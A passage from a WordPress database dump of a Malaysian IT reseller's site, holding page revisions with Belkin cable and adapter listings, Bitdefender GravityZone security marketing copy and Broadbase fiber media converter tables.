width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:05:06','2019-09-24 06:05:06','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3264,1,'2019-09-24 12:55:48','2019-09-24 04:55:48','<h2>THE BELKIN DIFFERENCE</h2><h4>Â </h4><h3>Innovation, with quality at its core</h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p><h3>Global leader in tech.</h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p><h3>Always looking to the future</h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p><h3>An unwavering commitment to earning your trust.</h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p><h3>Unmatched performance, every time</h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p><h3>We believe good design matters.</h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p><p>Â <br />Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p><h4>Product : -</h4><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" /></p><p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Mini DisplayPortTM to VGA</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Micro HDMI Adapter</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB A/B Device Cable * A/B DSTP</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr></tbody></table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 12:55:48','2019-09-24 04:55:48','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3263,1,'2019-09-24 12:55:21','2019-09-24 04:55:21','<h2>THE BELKIN DIFFERENCE</h2>\n<h4></h4>\n<h3>Innovation, with quality at its core</h3>\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\n<h3>Global leader in tech.</h3>\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\n<h3>Always looking to the future</h3>\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\n<h3>An unwavering commitment to earning your trust.</h3>\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\n<h3>Unmatched performance, every time</h3>\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\n<h3>We believe good design matters.</h3>\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\n&nbsp;\n<center>[maxbutton id=\"1\" ]</center>\n&nbsp;\n<h4>Product : -</h4>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Mini DisplayPortTM to VGA</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Micro HDMI Adapter</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB A/B Device Cable * A/B DSTP</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 12:55:21','2019-09-24 04:55:21','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(2701,1,'2018-12-21 15:33:50','2018-12-21 07:33:50','<h3>THE BELKIN DIFFERENCE</h3>\r\n<h4>Innovation, with quality at its core</h4>\r\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\r\n<h4>Global leader in tech.</h4>\r\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\r\n<h4>Always looking to the future</h4>\r\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\r\n<h4>An unwavering commitment to earning your trust.</h4>\r\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\r\n<h4>Unmatched performance, every time</h4>\r\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\r\n<h4>We believe good design matters.</h4>\r\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>Product : -</h4>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2329\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2330\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\r\n\r\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2331\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2332\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>Mini DisplayPortTM to VGA</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>Micro HDMI Adapter</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2335\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>USB A/B Device Cable * A/B DSTP</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2336\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2337\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2338\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2339\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2340\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2341\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-21 15:33:50','2018-12-21 07:33:50','',1446,'https://bintara.com.my/blog/2018/12/21/1446-revision-v1/',0,'revision','',0),(2702,1,'2018-12-21 15:45:40','2018-12-21 07:45:40','<h3>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h3>\r\n<h4 class=\"title\">Itâ€™s Time to Rethink Endpoint Security</h4>\r\n<h4>Protect Endpoints</h4>\r\nOrganizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security!Â <span class=\"hidden-text\">\r\nBitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.Â </span>\r\n<h3 id=\"products\" class=\"title-products\" style=\"text-align: left;\">Products</h3>\r\n<span class=\"hidden-text\">\r\n<img class=\"alignnone size-full wp-image-2414\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-elite-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n</span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2413\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-ultra-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Ultra SuiteÂ  --Â </strong>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2415\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-enterprise-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Enterprise Security --Â </strong>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</li>\r\n</ul>\r\n<h3 class=\"title\">Protect all devices</h3>\r\n<h4>Anti Ransomware</h4>\r\nRansomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.\r\n<h3 id=\"products\" class=\"title-products\">Products</h3>\r\nAll Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.\r\n\r\n<img class=\"alignnone size-full wp-image-2414\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-elite-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2413\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-ultra-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Security for Endpoints --Â </strong>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<span class=\"hidden-text\"><img class=\"alignnone size-full wp-image-2415\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-enterprise-Copy.png\" alt=\"\" width=\"100\" height=\"100\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Advanced Business Security --Â </strong>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2018-12-21 15:45:40','2018-12-21 07:45:40','',1448,'https://bintara.com.my/blog/2018/12/21/1448-revision-v1/',0,'revision','',0),(2703,1,'2018-12-21 16:06:34','2018-12-21 08:06:34','[vfb id=8]','Get Quotation (Broadbase)','','publish','closed','closed','','get-quotation-broadbase','','','2018-12-21 16:06:34','2018-12-21 08:06:34','',0,'https://bintara.com.my/?page_id=2703',0,'page','',0),(2704,1,'2018-12-21 16:06:22','2018-12-21 08:06:22','[vfb id=8]','Get Quotation (Broadbase)','','inherit','closed','closed','','2703-revision-v1','','','2018-12-21 16:06:22','2018-12-21 08:06:22','',2703,'https://bintara.com.my/blog/2018/12/21/2703-revision-v1/',0,'revision','',0),(2709,1,'2018-12-21 16:13:40','2018-12-21 08:13:40','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:13:40','2018-12-21 08:13:40','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2706,1,'2018-12-21 16:08:45','2018-12-21 08:08:45','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"736\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM 